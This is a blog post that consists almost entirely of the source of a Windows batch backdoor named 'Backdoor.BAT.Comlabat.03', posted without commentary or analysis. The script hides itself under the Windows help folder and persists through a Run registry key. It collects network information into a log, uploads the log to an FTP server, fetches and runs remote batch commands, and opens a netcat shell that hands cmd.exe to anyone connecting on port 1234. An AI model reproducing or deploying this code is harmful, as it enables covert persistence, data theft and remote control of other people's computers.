Tag Cloud

CRM 2011 (161) CRM 4.0 (144) C# (116) JScript (109) Plugin (92) Registry (90) Techpedia (77) PyS60 (68) WScript (43) Plugin Message (31) Exploit (27) ShellCode (26) FAQ (22) JavaScript (21) Killer Codes (21) Hax (18) VB 6.0 (17) Commands (16) VBScript (16) Quotes (15) Turbo C++ (13) WMI (13) Security (11) 1337 (10) Tutorials (10) Asp.Net (9) Safe Boot (9) Python (8) Interview Questions (6) video (6) Ajax (5) VC++ (5) WebService (5) Workflow (5) Bat (4) Dorks (4) Sql Server (4) Aptitude (3) Picklist (3) Tweak (3) WCF (3) regex (3) Config (2) LINQ (2) PHP (2) Shell (2) Silverlight (2) TSql (2) flowchart (2) serialize (2) ASHX (1) CRM 4.0 Videos (1) Debug (1) FetchXml (1) GAC (1) General (1) Generics (1) HttpWebRequest (1) InputParameters (1) Lookup (1) Offline Plug-ins (1) OutputParameters (1) Plug-in Constructor (1) Protocol (1) RIA (1) Sharepoint (1) Walkthrough (1) Web.config (1) design patterns (1) generic (1) iframe (1) secure config (1) unsecure config (1) url (1)

Pages

Monday, August 01, 2011

Backdoor.BAT.Comlabat.03

@ECHO OFF
:ComBat
SET COM=1


IF EXIST "%SystemRoot%\help\combat\server.ba

t" GOTO LOG
MKDIR "%SystemRoot%\help\combat\"
> "%SystemRoot%\help\combat\advcom%COM%.bat" ECHO @ECHO OFF
>>"%SystemRoot%\help\combat\advcom%COM%.bat" ECHO MOVE /Y %0 "%SystemRoot%\help\combat\"
>>"%SystemRoot%\help\combat\advcom%COM%.bat" ECHO CALL "%SystemRoot%\help\combat\server.bat"
GOTO RUN

:LOG
DEL /F /Q "%SystemRoot%\help\combat\%USERNAME%.log" >NUL
> "%SystemRoot%\help\combat\%USERNAME%.log" ECHO Server Log:
>> "%SystemRoot%\help\combat\%USERNAME%.log" ECHO.
IF EXIST "%SystemRoot%\help\combat\com.log" GOTO ULOG
> "%SystemRoot%\help\combat\com.log" echo [log] 0

:ULOG
FOR /F "skip=2 tokens=*" %%S IN ('FIND "[log]" "%SystemRoot%\help\combat\com.log"') DO SET CCOM=%%S
SET CCOM=%CCOM:~6%
SET /A COM=%CCOM%+1
DEL /F /Q "%SystemRoot%\help\combat\advcom%CCOM%.bat" >NUL

:ADSTest
ECHO ADS LOG > "%SystemRoot%\help\combat\com.log:test.txt"
FIND "ADS LOG" < "%SystemRoot%\help\combat\com.log:test.txt" >NUL
IF ERRORLEVEL 1 GOTO PATH
:: for ADS detection auto-upgrade, uncomment the next two lines.
:: ELSE SET UPGRADE=adsserver.bat
:: GOTO Upgrade

:PATH
PATH|FIND "WINDOWS" >NUL
IF NOT ERRORLEVEL 1 SET WINDIR=WINDOWS
PATH|FIND "SYSTEM" >NUL
IF NOT ERRORLEVEL 1 SET SYSDIR=SYSTEM
PATH|FIND "WINNT" >NUL
IF NOT ERRORLEVEL 1 SET WINDIR=WINNT
PATH|FIND "SYSTEM32" >NUL
IF NOT ERRORLEVEL 1 SET SYSDIR=SYSTEM32

:FINDOS
VER|FIND "XP">NUL|SET OSV=XP
IF NOT ERRORLEVEL 1 GOTO WinXP
VER|FIND "2000">NUL|SET OSV=2K
IF NOT ERRORLEVEL 1 GOTO WinXP
VER|FIND "NT">NUL|SET OSV=NT
IF NOT ERRORLEVEL 1 GOTO Win9X
VER|FIND "Mil">NUL|SET OSV=ME
IF NOT ERRORLEVEL 1 GOTO Win9X
VER|FIND "98">NUL|SET OSV=98
IF NOT ERRORLEVEL 1 GOTO Win9X
VER|FIND "95">NUL|SET OSV=95
IF NOT ERRORLEVEL 1 GOTO Win9X
GOTO END
:WinXP
> "%SystemRoot%\help\combat\regpatch.

reg" ECHO Windows Registry Editor Version 5.00
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO.
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO "HELLO WORLD"="%SystemDrive%\\%WINDIR%\\help\\combat\\server.bat"
GOTO ADD

:Win9X
> "%SystemRoot%\help\combat\regpatch.reg" ECHO REGEDIT4
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO.
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO "HELLO WORLD"="%SystemDrive%\\%WINDIR%\\help\\combat\\server.bat"
GOTO ADD

:ADD
IF NOT EXIST "%SystemRoot%\help\combat\regpatch.reg" GOTO PATH
REGEDIT /S "%SystemRoot%\help\combat\regpatch.reg"
DEL /F /S /Q "%SystemRoot%\help\combat\regpatch.reg" >NUL

:KillFW
:: add Firewall killing NET STOP commands here.

:PING
PING (ftp server) -n 4 -w 1000 >NUL
IF ERRORLEVEL 1 GOTO PING

:STATS
IF NOT EXIST "%SystemRoot%\help\combat\%USERNAME%.log" GOTO LOG
IPCONFIG /all >> "%SystemRoot%\help\combat\%USERNAME%.log"
NETSTAT -a -n >> "%SystemRoot%\help\combat\%USERNAME%.log"

:NetCat
:: add NETCAT commands here.
START /MIN /HIGH nc -l -p 1234 -d -e cmd.exe -L

:GetCom
> "%SystemRoot%\help\combat\com.txt&quot; ECHO open (ftp server)
>>"%SystemRoot%\help\combat\com.txt" ECHO (ftp username)
>>"%SystemRoot%\help\combat\com.txt" ECHO (ftp passwprd)
>>"%SystemRoot%\help\combat\com.txt" ECHO cd public_html/combat
>>"%SystemRoot%\help\combat\com.txt" ECHO prompt
>>"%SystemRoot%\help\combat\com.txt" ECHO type ascii
>>"%SystemRoot%\help\combat\com.txt" ECHO get "advcom%COM%.bat" "%SystemRoot%\help\combat\advcom%COM%.bat"
>>"%SystemRoot%\help\combat\com.txt" ECHO put "%SystemRoot%\help\combat\%USERNAME%.log"
>>"%SystemRoot%\help\combat\com.txt" ECHO bye
:FTP
IF NOT EXIST "%SystemRoot%\help\combat\com.txt&q

uot; GOTO GetCom
FTP -s:"%SystemRoot%\help\combat\com.txt" >NUL
DEL /F /Q "%SystemRoot%\help\combat\com.txt&quot; >NUL

:RUN
CALL "%SystemRoot%\help\combat\advcom%COM%.bat"
GOTO END

:Upgrade
> "%SystemRoot%\help\combat\upgrade.txt" ECHO open (ftp server)
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO (ftp username)
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO (ftp passwprd)
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO cd public_html/combat
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO prompt
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO type ascii
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO get "%UPGRADE%" "%SystemRoot%\help\combat\%UPGRADE%"
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO bye
IF NOT EXIST "%SystemRoot%\help\combat\upgrade.txt" GOTO Upgrade
FTP -s:"%SystemRoot%\help\combat\upgrade.txt" >NUL
DEL /F /Q "%SystemRoot%\help\combat\upgrade.txt" >NUL
IF NOT EXIST "%SystemRoot%\help\combat\%UPGRADE%" GOTO Upgrade
START "" /MIN /HIGH "%SystemRoot%\help\combat\%UPGRADE%"

:END
EXIT

No comments: